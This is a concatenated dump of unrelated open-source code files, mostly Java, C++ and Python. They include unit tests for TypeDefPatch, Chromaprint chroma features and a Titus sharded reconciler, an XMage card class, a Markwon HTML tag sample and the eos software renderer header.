anotherTestObject.setPropertyDefinitions(new ArrayList<>());
anotherTestObject.setExternalStandardMappings(new ArrayList<>());
anotherTestObject.setTypeDefOptions(new HashMap<>());
assertNull(anotherTestObject.getValidInstanceStatusList());
assertNull(anotherTestObject.getPropertyDefinitions());
assertNull(anotherTestObject.getExternalStandardMappings());
assertNull(anotherTestObject.getTypeDefOptions());
}
/**
* Validate that an object generated from a JSON String has the same content as the object used to
* create the JSON String.
*/
@Test public void testJSON()
{
ObjectMapper objectMapper = new ObjectMapper();
String jsonString = null;
try
{
jsonString = objectMapper.writeValueAsString(getTestObject());
}
catch (Throwable exc)
{
assertTrue(false, "Exception: " + exc.getMessage());
}
try
{
validateObject(objectMapper.readValue(jsonString, TypeDefPatch.class));
}
catch (Throwable exc)
{
assertTrue(false, "Exception: " + exc.getMessage());
}
}
/**
* Test that toString is overridden.
*/
@Test public void testToString()
{
assertTrue(getTestObject().toString().contains("TypeDefPatch"));
}
/**
* Test that equals works
*/
@Test public void testEquals()
{
assertTrue(getTestObject().equals(getTestObject()));
TypeDefPatch testObject = getTestObject();
assertTrue(testObject.equals(testObject));
assertFalse(getTestObject().equals(null));
assertFalse(getTestObject().equals("A String"));
TypeDefPatch differentObject = new TypeDefPatch();
assertFalse(testObject.equals(differentObject));
differentObject = getTestObject();
differentObject.setNewVersionName("DifferentHomeId");
assertFalse(testObject.equals(differentObject));
}
/**
* Test that hashcode is consistent
*/
@Test public void testHash()
{
assertTrue(getTestObject().hashCode() == getTestObject().hashCode());
TypeDefPatch testObject = getTestObject();
TypeDefPatch anotherObject = getTestObject();
anotherObject.setTypeDefGUID("DifferentAuthor");
assertFalse(testObject.hashCode() == anotherObject.hashCode());
}
}
| 3,572 |
307 | package com.tairanchina.csp.avm.service;
import com.tairanchina.csp.avm.entity.App;
/**
* Created by hzlizx on 2018/6/25 0025
*/
public interface AppService {
/**
* 根据应用ID获取应用
* @param tenantAppId 应用ID
* @return 应用
*/
App findAppByTenantAppId(String tenantAppId);
}
| 166 |
1,444 | <gh_stars>1000+
package mage.cards.a;
import java.util.UUID;
import mage.MageInt;
import mage.abilities.Ability;
import mage.abilities.common.EntersBattlefieldTriggeredAbility;
import mage.abilities.effects.OneShotEffect;
import mage.abilities.keyword.VigilanceAbility;
import mage.cards.CardImpl;
import mage.cards.CardSetInfo;
import mage.constants.CardType;
import mage.constants.Outcome;
import mage.constants.SubType;
import mage.game.Game;
import mage.players.Player;
import mage.players.PlayerList;
/**
*
* @author anonymous
*/
public final class ArbiterOfKnollridge extends CardImpl {
public ArbiterOfKnollridge(UUID ownerId, CardSetInfo setInfo) {
super(ownerId,setInfo,new CardType[]{CardType.CREATURE},"{6}{W}");
this.subtype.add(SubType.GIANT);
this.subtype.add(SubType.WIZARD);
this.power = new MageInt(5);
this.toughness = new MageInt(5);
// Vigilance
this.addAbility(VigilanceAbility.getInstance());
// When Arbiter of Knollridge enters the battlefield, each player's life total becomes the highest life total among all players.
this.addAbility(new EntersBattlefieldTriggeredAbility(new ArbiterOfKnollridgeEffect()));
}
private ArbiterOfKnollridge(final ArbiterOfKnollridge card) {
super(card);
}
@Override
public ArbiterOfKnollridge copy() {
return new ArbiterOfKnollridge(this);
}
}
class ArbiterOfKnollridgeEffect extends OneShotEffect {
ArbiterOfKnollridgeEffect() {
super(Outcome.GainLife);
staticText = "each player's life total becomes the highest life total among all players";
}
ArbiterOfKnollridgeEffect(final ArbiterOfKnollridgeEffect effect) {
super(effect);
}
@Override
public boolean apply(Game game, Ability source) {
int maxLife = 0;
PlayerList playerList = game.getState().getPlayersInRange(source.getControllerId(), game);
for (UUID pid : playerList) {
Player p = game.getPlayer(pid);
if (p != null) {
if (maxLife < p.getLife()) {
maxLife = p.getLife();
}
}
}
for (UUID pid : playerList) {
Player p = game.getPlayer(pid);
if (p != null) {
p.setLife(maxLife, game, source);
}
}
return true;
}
@Override
public ArbiterOfKnollridgeEffect copy() {
return new ArbiterOfKnollridgeEffect(this);
}
} | 1,020 |
1,031 |
int foofunction(int i) {
return i *= 10;
}
struct FooClass {
int foomethod(int i) {
return i += 5;
}
};
| 52 |
2,113 | <reponame>dandycheung/Markwon<gh_stars>1000+
package io.noties.markwon.app.samples.html;
import android.text.style.AbsoluteSizeSpan;
import androidx.annotation.NonNull;
import java.util.Collection;
import java.util.Collections;
import java.util.Random;
import io.noties.markwon.AbstractMarkwonPlugin;
import io.noties.markwon.Markwon;
import io.noties.markwon.MarkwonVisitor;
import io.noties.markwon.SpannableBuilder;
import io.noties.markwon.app.sample.ui.MarkwonTextViewSample;
import io.noties.markwon.html.HtmlPlugin;
import io.noties.markwon.html.HtmlTag;
import io.noties.markwon.html.MarkwonHtmlRenderer;
import io.noties.markwon.html.TagHandler;
import io.noties.markwon.sample.annotations.MarkwonArtifact;
import io.noties.markwon.sample.annotations.MarkwonSampleInfo;
import io.noties.markwon.sample.annotations.Tag;
@MarkwonSampleInfo(
id = "20200630114923",
title = "Random char size HTML tag",
description = "Implementation of a custom HTML tag handler " +
"that assigns each character a random size",
artifacts = MarkwonArtifact.HTML,
tags = {Tag.rendering, Tag.span, Tag.html}
)
public class HtmlRandomCharSize extends MarkwonTextViewSample {
@Override
public void render() {
final String md = "" +
"<random-char-size>\n" +
"This message should have a jumpy feeling because of different sizes of characters\n" +
"</random-char-size>\n\n";
final Markwon markwon = Markwon.builder(context)
.usePlugin(HtmlPlugin.create())
.usePlugin(new AbstractMarkwonPlugin() {
@Override
public void configure(@NonNull Registry registry) {
registry.require(HtmlPlugin.class, htmlPlugin -> htmlPlugin
.addHandler(new RandomCharSize(new Random(42L), textView.getTextSize())));
}
})
.build();
markwon.setMarkdown(textView, md);
}
}
class RandomCharSize extends TagHandler {
private final Random random;
private final float base;
RandomCharSize(@NonNull Random random, float base) {
this.random = random;
this.base = base;
}
@Override
public void handle(
@NonNull MarkwonVisitor visitor,
@NonNull MarkwonHtmlRenderer renderer,
@NonNull HtmlTag tag) {
final SpannableBuilder builder = visitor.builder();
// text content is already added, we should only apply spans
for (int i = tag.start(), end = tag.end(); i < end; i++) {
final int size = (int) (base * (random.nextFloat() + 0.5F) + 0.5F);
builder.setSpan(new AbsoluteSizeSpan(size, false), i, i + 1);
}
}
@NonNull
@Override
public Collection<String> supportedTags() {
return Collections.singleton("random-char-size");
}
}
| 952 |
582 | <reponame>CyberSinh/chromaprint<gh_stars>100-1000
#include <vector>
#include <algorithm>
#include <gtest/gtest.h>
#include "fft_frame.h"
#include "chroma.h"
using namespace chromaprint;
class FeatureVectorBuffer : public FeatureVectorConsumer
{
public:
void Consume(std::vector<double> &features)
{
m_features = features;
}
std::vector<double> m_features;
};
TEST(Chroma, NormalA) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[113] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
1.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, NormalGSharp) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[112] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, NormalB) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[64] = 1.0; // 250 Hz
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.0, 1.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedB) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[64] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.286905, 0.713095, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedA) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[113] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.555242, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.444758,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedGSharp) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[112] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.401354, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.598646,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
| 1,615 |
339 | <reponame>aliteff/ddd-strategic-design-spring-boot
package com.innoq.mploed.ddd.customercontact;
import io.prometheus.client.spring.boot.EnablePrometheusEndpoint;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
@EnablePrometheusEndpoint
public class CustomerContactSpringBootApplication {
public static void main(String[] args) throws InterruptedException {
SpringApplication.run(CustomerContactSpringBootApplication.class, args);
}
}
| 161 |
1,137 | <reponame>Q-Y-H/fitlog<filename>tests/fastgit/test_fastgit.py<gh_stars>1000+
import unittest
import os
import shutil
from fitlog.fastgit import committer
class TextExample(unittest.TestCase):
def setUp(self): # 定义一个setup,放一些准备的工作,或者准备一些测试数据。
os.mkdir('testArea')
def test_init(self):
ret = committer.init_project('testArea/test_pj', git=False)
self.assertEqual(ret, 0)
def tearDown(self): # 定义一个tearDown,在测试完的时候我要对测试有一个销毁的过程
shutil.rmtree('testArea', ignore_errors=True)
# 基本参考 https://docs.python.org/zh-cn/3/library/unittest.html
# mock 提供了更多的可能性 https://docs.python.org/zh-cn/3/library/unittest.mock.html
| 381 |
313 | <gh_stars>100-1000
/*
* Copyright 2021 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.framework.simplereconciler.internal;
import java.util.Iterator;
import java.util.List;
import com.google.common.base.Preconditions;
import com.netflix.titus.common.framework.simplereconciler.SimpleReconcilerEvent;
import com.netflix.titus.common.util.closeable.CloseableReference;
import org.junit.After;
import org.junit.Test;
import reactor.core.publisher.Mono;
import reactor.core.scheduler.Scheduler;
import reactor.core.scheduler.Schedulers;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.fail;
public class ShardedManyReconcilerTest {
private final StubManyReconciler<String> shard1 = new StubManyReconciler<>();
private final StubManyReconciler<String> shard2 = new StubManyReconciler<>();
private final CloseableReference<Scheduler> notificationSchedulerRef = CloseableReference.referenceOf(
Schedulers.newSingle("reconciler-notification-junit", true), Scheduler::dispose
);
private final ShardedManyReconciler<String> reconciler = new ShardedManyReconciler<>(
2,
id -> id.contains("shard1") ? 0 : 1,
shardIdx -> {
Preconditions.checkArgument(shardIdx < 2);
return shardIdx == 0 ? shard1 : shard2;
},
notificationSchedulerRef
);
@After
public void tearDown() throws Exception {
reconciler.close().block();
}
@Test(timeout = 30_000)
public void testAdd() {
Iterator<List<SimpleReconcilerEvent<String>>> eventsIt = reconciler.changes("junit").toIterable().iterator();
assertThat(eventsIt.hasNext()).isTrue();
assertThat(eventsIt.next()).isEmpty();
// Shard1
reconciler.add("abc_shard1", "value1").block();
expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Added, "abc_shard1", "value1");
assertThat(shard1.findById("abc_shard1")).isNotNull();
assertThat(shard2.getAll()).isEmpty();
// Shard2
reconciler.add("abc_shard2", "value2").block();
expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Added, "abc_shard2", "value2");
assertThat(shard1.getAll()).hasSize(1);
assertThat(shard2.findById("abc_shard1")).isNotNull();
}
@Test(timeout = 30_000)
public void testApplyChange() {
Iterator<List<SimpleReconcilerEvent<String>>> eventIt = addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
reconciler.apply("1@shard1", data -> Mono.just("1")).block();
expectEvent(eventIt, SimpleReconcilerEvent.Kind.Updated, "1@shard1", "1");
assertThat(reconciler.getAll()).containsEntry("1@shard1", "1");
reconciler.apply("4@shard2", data -> Mono.just("2")).block();
expectEvent(eventIt, SimpleReconcilerEvent.Kind.Updated, "4@shard2", "2");
}
@Test(timeout = 30_000)
public void testRemove() {
Iterator<List<SimpleReconcilerEvent<String>>> eventId = addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
reconciler.remove("1@shard1").block();
expectEvent(eventId, SimpleReconcilerEvent.Kind.Removed, "1@shard1", "");
reconciler.remove("3@shard2").block();
expectEvent(eventId, SimpleReconcilerEvent.Kind.Removed, "3@shard2", "");
assertThat(shard1.getAll()).hasSize(1).containsKey("2@shard1");
assertThat(shard2.getAll()).hasSize(1).containsKey("4@shard2");
}
@Test(timeout = 30_000)
public void testGetAllAndSize() {
addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.getAll()).containsKeys("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.size()).isEqualTo(4);
}
@Test(timeout = 30_000)
public void testFindById() {
addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.findById("1@shard1")).isNotEmpty();
assertThat(reconciler.findById("4@shard2")).isNotEmpty();
assertThat(reconciler.findById("wrongId")).isEmpty();
}
@Test
public void testClose() {
reconciler.close().block();
try {
reconciler.add("abc", "v").block();
fail("Expected add failure");
} catch (Exception e) {
assertThat(e).isInstanceOf(IllegalStateException.class);
assertThat(e.getMessage()).contains("Sharded reconciler closed");
}
}
private Iterator<List<SimpleReconcilerEvent<String>>> addData(String... ids) {
for (String id : ids) {
reconciler.add(id, "").block();
}
Iterator<List<SimpleReconcilerEvent<String>>> eventsIt = reconciler.changes("junit").toIterable().iterator();
assertThat(eventsIt.hasNext()).isTrue();
List<SimpleReconcilerEvent<String>> next = eventsIt.next();
assertThat(next).hasSize(ids.length);
return eventsIt;
}
private void expectEvent(Iterator<List<SimpleReconcilerEvent<String>>> eventsIt,
SimpleReconcilerEvent.Kind kind, String id, String value) {
assertThat(eventsIt.hasNext()).isTrue();
List<SimpleReconcilerEvent<String>> next = eventsIt.next();
assertThat(next).hasSize(1);
assertThat(next.get(0).getKind()).isEqualTo(kind);
assertThat(next.get(0).getId()).isEqualTo(id);
assertThat(next.get(0).getData()).isEqualTo(value);
}
} | 2,485 |
369 | /*
* Eos - A 3D Morphable Model fitting library written in modern C++11/14.
*
* File: include/eos/render/render.hpp
*
* Copyright 2014, 2015 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#ifndef RENDER_HPP_
#define RENDER_HPP_
#include "eos/render/detail/render_detail.hpp"
#include "eos/render/utils.hpp"
#include "opencv2/core/core.hpp"
#ifdef WIN32
#define BOOST_ALL_DYN_LINK // Link against the dynamic boost lib. Seems to be necessary because we use /MD, i.e. link to the dynamic CRT.
#define BOOST_ALL_NO_LIB // Don't use the automatic library linking by boost with VS2010 (#pragma ...). Instead, we specify everything in cmake.
#endif
#include "boost/optional.hpp"
#include <array>
#include <vector>
#include <memory>
namespace eos {
namespace render {
/**
* This file implements a software renderer conforming to OpenGL conventions. The
* following are implementation notes, mostly for reference, or as a reminder of
* what exactly is going on. Don't try to understand them :-)
*
* The renderer was initially based on code by <NAME>
* (http://maxest.gct-game.net/content/vainmoinen/index.html), however, it has since
* then been completely rewritten. Still I'd like to thank him for making his code
* available and bravely answering my questions via email.
*
* Coordinate systems:
* When specifying the vertices: +x = right, +y = up, we look into -z.
* So z = 0.5 is in front of 0.0.
* Z-Buffer:
*
* Shirley: Specify n and f with negative values. which makes sense b/c the points
* are along the -z axis.
* Consequences: notably: orthogonal(2, 3): Shirley has denominator (n-f).
* In what space are the points in Shirley after this?
* OGL: We're in the orthographic viewing volume looking down -z.
* However, n and f are specified positive.
* B/c the 3D points in front of the cam obviously still have negative z values, the
* z-value is negated. So: n = 0.1, f = 100; With the given OpenGL ortho matrix,
* it means a point on the near-plane which will have z = -0.1 will land up
* on z_clip (which equals z_ndc with ortho because w=1) = -1, and a point on
* the far plane z = -100 will have z_ndc = +1.
*
* That's also why in the perspective case, w_clip is set to -z_eye because
* to project a point the formula is $x_p = (-n * x_e)/z_e$ (because our near is
* specified with positive values, but the near-plane is _really_ at -n); but now we
* just move the minus-sign to the denominator, $x_p = (n * x_e)/-z_e$, so in the projection matrix we can use
* the (positive) n and f values and afterwards we divide by w = -z_e.
*
* http://www.songho.ca/opengl/gl_projectionmatrix.html
*
* Random notes:
* clip-space: after applying the projection matrix.
* ndc: after division by w
* NDC cube: the range of x-coordinate from [l, r] to [-1, 1], the y-coordinate from [b, t] to [-1, 1] and the z-coordinate from [n, f] to [-1, 1].
*
* Note/Todo: I read that in screen space, OpenGL transform the z-values again to be between 0 and 1?
*
* In contrast to OGL, this renderer doesn't have state, it's just a function that gets called with all
* necessary parameters. It's easiest for our purposes.
*
* Here's the whole rendering pipeline:
* Model space
* -> model transforms
* World space
* -> camera (view/eye) transform
* View / eye / camera space ("truncated pyramid frustum". In case of ortho, it's already rectangular.)
* -> perspective/ortho projection
* Clip coords (x_c, y_c, z_c, w_c); the z-axis is flipped now. z [z=-n, z=-f] is mapped to [-1, +1] in case of ortho, but not yet in case of persp (it's also flipped though), but the not-[-1,1]-range is fine as we test against w_c. I.e. the larger the z-value, the further back we are.
* Do frustum culling (clipping) here. Test the clip-coords with w_c, and discard if a tri is completely outside.
* Of the partially visible tris, clip them against the near-plane and construct the visible part of the triangle.
* We only do this for the near-plane here. Clipping to the near plane must be done here because after w-division triangles crossing it would get distorted.
* "Then, OpenGL will reconstruct the edges of the polygon where clipping occurs."
* -> Then divide by the w component of the clip coordinates
* NDC. (now only 3D vectors: [x_ndc, y_ndc, z_ndc]). nearest points have z=-1, points on far plane have z=+1.
* -> window transform. (also, OGL does some more to the z-buffer?)
* Screen / window space
* Directly after window-transform (still processing triangles), do backface culling with areVerticesCCWInScreenSpace()
* Directly afterwards we calculate the triangle's bounding box and clip x/y (screen) against 0 and the viewport width/height.
* Rasterising: Clipping against the far plane here by only drawing those pixels with a z-value of <= 1.0f.
*
* OGL: "both clipping (frustum culling) and NDC transformations are integrated into GL_PROJECTION matrix"
*
* Note: In both the ortho and persp case, points at z=-n end up at -1, z=-f at +1. In case of persp proj., this happens only after the divide by w.
*/
/**
* Renders the given mesh onto a 2D image using 4x4 model-view and
* projection matrices. Conforms to OpenGL conventions.
*
* @param[in] mesh A 3D mesh.
* @param[in] model_view_matrix A 4x4 OpenGL model-view matrix.
* @param[in] projection_matrix A 4x4 orthographic or perspective OpenGL projection matrix.
* @param[in] viewport_width Screen width.
* @param[in] viewport_height Screen height.
* @param[in] texture An optional texture map (TODO: Not optional yet!).
* @param[in] enable_backface_culling Whether the renderer should perform backface culling. If true, only draw triangles with vertices ordered CCW in screen-space.
* @param[in] enable_near_clipping Screen height.
* @param[in] enable_far_clipping Screen height.
* @return A pair with the colourbuffer as its first element and the depthbuffer as the second element.
*/
std::pair<cv::Mat, cv::Mat> render(Mesh mesh, cv::Mat model_view_matrix, cv::Mat projection_matrix, int viewport_width, int viewport_height, const Texture& texture, bool enable_backface_culling = false, bool enable_near_clipping = true, bool enable_far_clipping = true)
{
// Some internal documentation / old todos or notes:
// maybe change and pass depthBuffer as an optional arg (&?), because usually we never need it outside the renderer. Or maybe even a getDepthBuffer().
// modelViewMatrix goes to eye-space (camera space), projection does ortho or perspective proj.
// bool enable_texturing = false; Maybe re-add later, not sure
// take a cv::Mat texture instead and convert to Texture internally? no, we don't want to recreate mipmap levels on each render() call.
assert(mesh.vertices.size() == mesh.colors.size() || mesh.colors.empty()); // The number of vertices has to be equal for both shape and colour, or, alternatively, it has to be a shape-only model.
assert(mesh.vertices.size() == mesh.texcoords.size() || mesh.texcoords.empty()); // same for the texcoords
// another assert: If cv::Mat texture != empty, then we need texcoords?
using cv::Mat;
using std::vector;
Mat colourbuffer = Mat::zeros(viewport_height, viewport_width, CV_8UC4); // make sure it's CV_8UC4?
Mat depthbuffer = std::numeric_limits<float>::max() * Mat::ones(viewport_height, viewport_width, CV_64FC1);
// Vertex shader:
//processedVertex = shade(Vertex); // processedVertex : pos, col, tex, texweight
// Assemble the vertices, project to clip space, and store as detail::Vertex (the internal representation):
vector<detail::Vertex> clipspace_vertices;
clipspace_vertices.reserve(mesh.vertices.size());
for (int i = 0; i < mesh.vertices.size(); ++i) { // "previously": mesh.vertex
Mat clipspace_coords = projection_matrix * model_view_matrix * Mat(mesh.vertices[i]);
cv::Vec3f vertex_colour;
if (mesh.colors.empty()) {
vertex_colour = cv::Vec3f(0.5f, 0.5f, 0.5f);
}
else {
vertex_colour = mesh.colors[i];
}
clipspace_vertices.push_back(detail::Vertex(clipspace_coords, vertex_colour, mesh.texcoords[i]));
}
// All vertices are in clip-space now.
// Prepare the rasterisation stage.
// For every vertex/tri:
vector<detail::TriangleToRasterize> triangles_to_raster;
for (const auto& tri_indices : mesh.tvi) {
// Todo: Split this whole stuff up. Make a "clip" function, ... rename "processProspective..".. what is "process"... get rid of "continue;"-stuff by moving stuff inside process...
// classify vertices visibility with respect to the planes of the view frustum
// we're in clip-coords (NDC), so just check if outside [-1, 1] x ...
// Actually we're in clip-coords and it's not the same as NDC. We're only in NDC after the division by w.
// We should do the clipping in clip-coords though. See http://www.songho.ca/opengl/gl_projectionmatrix.html for more details.
// However, when comparing against w_c below, we might run into the trouble of the sign again in the affine case.
// 'w' is always positive, as it is -z_camspace, and all z_camspace are negative.
unsigned char visibility_bits[3];
for (unsigned char k = 0; k < 3; k++)
{
visibility_bits[k] = 0;
float x_cc = clipspace_vertices[tri_indices[k]].position[0];
float y_cc = clipspace_vertices[tri_indices[k]].position[1];
float z_cc = clipspace_vertices[tri_indices[k]].position[2];
float w_cc = clipspace_vertices[tri_indices[k]].position[3];
if (x_cc < -w_cc) // true if outside of view frustum. False if on or inside the plane.
visibility_bits[k] |= 1; // set bit if outside of frustum
if (x_cc > w_cc)
visibility_bits[k] |= 2;
if (y_cc < -w_cc)
visibility_bits[k] |= 4;
if (y_cc > w_cc)
visibility_bits[k] |= 8;
if (enable_near_clipping && z_cc < -w_cc) // near plane frustum clipping
visibility_bits[k] |= 16;
if (enable_far_clipping && z_cc > w_cc) // far plane frustum clipping
visibility_bits[k] |= 32;
} // if all bits are 0, then it's inside the frustum
// all vertices are not visible - reject the triangle.
if ((visibility_bits[0] & visibility_bits[1] & visibility_bits[2]) > 0)
{
continue;
}
// all vertices are visible - pass the whole triangle to the rasterizer. = All bits of all 3 triangles are 0.
if ((visibility_bits[0] | visibility_bits[1] | visibility_bits[2]) == 0)
{
boost::optional<detail::TriangleToRasterize> t = detail::process_prospective_tri(clipspace_vertices[tri_indices[0]], clipspace_vertices[tri_indices[1]], clipspace_vertices[tri_indices[2]], viewport_width, viewport_height, enable_backface_culling);
if (t) {
triangles_to_raster.push_back(*t);
}
continue;
}
// at this moment the triangle is known to be intersecting one of the view frustum's planes
std::vector<detail::Vertex> vertices;
vertices.push_back(clipspace_vertices[tri_indices[0]]);
vertices.push_back(clipspace_vertices[tri_indices[1]]);
vertices.push_back(clipspace_vertices[tri_indices[2]]);
// split the triangle if it intersects the near plane:
if (enable_near_clipping)
{
vertices = detail::clip_polygon_to_plane_in_4d(vertices, cv::Vec4f(0.0f, 0.0f, -1.0f, -1.0f)); // "Normal" (or "4D hyperplane") of the near-plane. I tested it and it works like this but I'm a little bit unsure because Songho says the normal of the near-plane is (0,0,-1,1) (maybe I have to switch around the < 0 checks in the function?)
}
// triangulation of the polygon formed of vertices array
if (vertices.size() >= 3)
{
for (unsigned char k = 0; k < vertices.size() - 2; k++)
{
boost::optional<detail::TriangleToRasterize> t = detail::process_prospective_tri(vertices[0], vertices[1 + k], vertices[2 + k], viewport_width, viewport_height, enable_backface_culling);
if (t) {
triangles_to_raster.push_back(*t);
}
}
}
}
// Fragment/pixel shader: Colour the pixel values
// for every tri:
for (const auto& tri : triangles_to_raster) {
detail::raster_triangle(tri, colourbuffer, depthbuffer, texture, enable_far_clipping);
}
return std::make_pair(colourbuffer, depthbuffer);
};
} /* namespace render */
} /* namespace eos */
#endif /* RENDER_HPP_ */
| 4,152 |
435 | <gh_stars>100-1000
{
"description": "In the real-world there are 10000s of B2B companies. Their app-stack fits the multi-tenant model - each tenant(customer) deals with it\u2019s own data. It is super critical to build scalable applications which gives the company leeway to grow as more customers get on-boarded. Let\u2019s learn how to do that!\n\nPresentation page -- https://2018.pycon.ca/talks/talk-A-9014",
"recorded": "2018-11-11",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/RKSwjaZKXL0/hqdefault.jpg",
"title": "Scaling multi-tenant apps using the Django ORM and Postgres",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=RKSwjaZKXL0"
}
]
}
| 273 |
4,879 | #include "generator/processor_world.hpp"
#include "generator/cities_boundaries_builder.hpp"
#include "generator/feature_builder.hpp"
#include "generator/generate_info.hpp"
#include "defines.hpp"
namespace generator
{
ProcessorWorld::ProcessorWorld(std::shared_ptr<FeatureProcessorQueue> const & queue,
std::string const & popularityFilename)
: m_popularityFilename(popularityFilename), m_queue(queue)
{
m_processingChain = std::make_shared<RepresentationLayer>();
m_processingChain->Add(std::make_shared<PrepareFeatureLayer>());
m_processingChain->Add(std::make_shared<WorldLayer>(popularityFilename));
auto affiliation = std::make_shared<feature::SingleAffiliation>(WORLD_FILE_NAME);
m_affiliationsLayer =
std::make_shared<AffiliationsFeatureLayer<>>(kAffiliationsBufferSize, affiliation, m_queue);
m_processingChain->Add(m_affiliationsLayer);
}
std::shared_ptr<FeatureProcessorInterface> ProcessorWorld::Clone() const
{
return std::make_shared<ProcessorWorld>(m_queue, m_popularityFilename);
}
void ProcessorWorld::Process(feature::FeatureBuilder & feature)
{
m_processingChain->Handle(feature);
}
void ProcessorWorld::Finish() { m_affiliationsLayer->AddBufferToQueue(); }
} // namespace generator
| 414 |
491 | <gh_stars>100-1000
package top.naccl.service;
import top.naccl.entity.CityVisitor;
public interface CityVisitorService {
void saveCityVisitor(CityVisitor cityVisitor);
}
| 60 |
306 | /*
* Copyright (c) 2015 IBM Corporation and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.brunel.data.modify;
import org.brunel.data.Data;
import org.brunel.data.Dataset;
import org.brunel.data.Field;
import org.brunel.data.Fields;
/**
* The command may be "", which means no operation.
* Otherwise, it is of the format "field:count". The field must be numeric, otherwise it is an error
* It is used as the "size" by which the rows are divided out. It is very commonly just #count
* The end result will be a Dataset with exactly the requested number of rows (which should be greater than 0)
*/
public class SetRowCount extends DataOperation {
/*
Each of the operations has as a key the new field to be created
The operation is one of the following
FIELD_NAME -- a field to be used as a dimension (a factor or group)
FIELD_NAME : base -- a field to be used as a dimension AND a base for percentages
FIELD_NAME : transform -- a measure to use to transform the field (e.g. 'mean', 'count', ...)
Note that an empty field is legal for the count transform
*/
public static Dataset transform(Dataset base, String command) {
if (base.rowCount() == 0 || command.isEmpty()) return base;
